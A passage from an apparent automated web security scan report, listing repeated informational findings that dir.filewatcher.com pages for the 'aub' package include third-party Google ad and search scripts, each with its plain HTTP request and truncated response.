<title>/FreeBSD/7.0-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.66. http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ELLhiiMD7yqGLFeQ0s87kA"
Content-Length: 25796
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.67. http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "BhgQiQdlEC4RQFMip3u91w"
Content-Length: 25724
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 205
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.68. http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GjJmICQXTmvRx3IXwKzHFg"
Content-Length: 26054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 203
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.69. http://dir.filewatcher.com/d/FreeBSD/8-current.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/8-current.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cyW2PMprK1qa1U34+TL0eA"
Content-Length: 4654
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 232
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/8-current/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.70. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/8-current/amd64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current/amd64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "aT+KeR04oiD7Xb2ZILBjxw"
Content-Length: 15827
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 232
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/8-current/amd64/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.71. http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:41 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "s2mj51RYwAHAE2nf1YJJzg"
Content-Length: 25311
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.72. http://dir.filewatcher.com/d/FreeBSD/distfiles.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/distfiles.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/distfiles.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "LnigdWAZxzdvvjKtvYsYzQ"
Content-Length: 5076
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 211
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/distfiles/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.73. http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3AEFmKo5VIqWSbFfF/jTWA"
Content-Length: 21547
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 217
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.74. http://dir.filewatcher.com/d/OpenBSD.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0125ABiqiU2WwPMCks8RyA"
Content-Length: 5858
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/</title>
</head>
<body
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.75. http://dir.filewatcher.com/d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22 HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 15:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ftZg8Suarl4gLJMGsEwksg"
Content-Length: 3557
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title></title>
</head>
<body class="nb
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.76. http://dir.filewatcher.com/d/OpenBSD/3.4.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:32 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zBx1lJs1lrKjfifjT/ynag"
Content-Length: 5125
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.77. http://dir.filewatcher.com/d/OpenBSD/3.4/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8ZwpAnkk2M+ybZNTCiDGfg"
Content-Length: 14652
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.78. http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cKdin3ZdqrGl07/9m4nYyA"
Content-Length: 21147
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 155
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.79. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:31 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Mk8kdpEebSex7glduf1ExA"
Content-Length: 14692
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/sparc/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.80. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GJWxiO1o71UMYTNBAno0Ig"
Content-Length: 22842
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.81. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc64.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/3.4/sparc64.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kltTuv6qQh686aT3VA8jow"
Content-Length: 14713
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 154
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/3.4/sparc64/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.82. http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
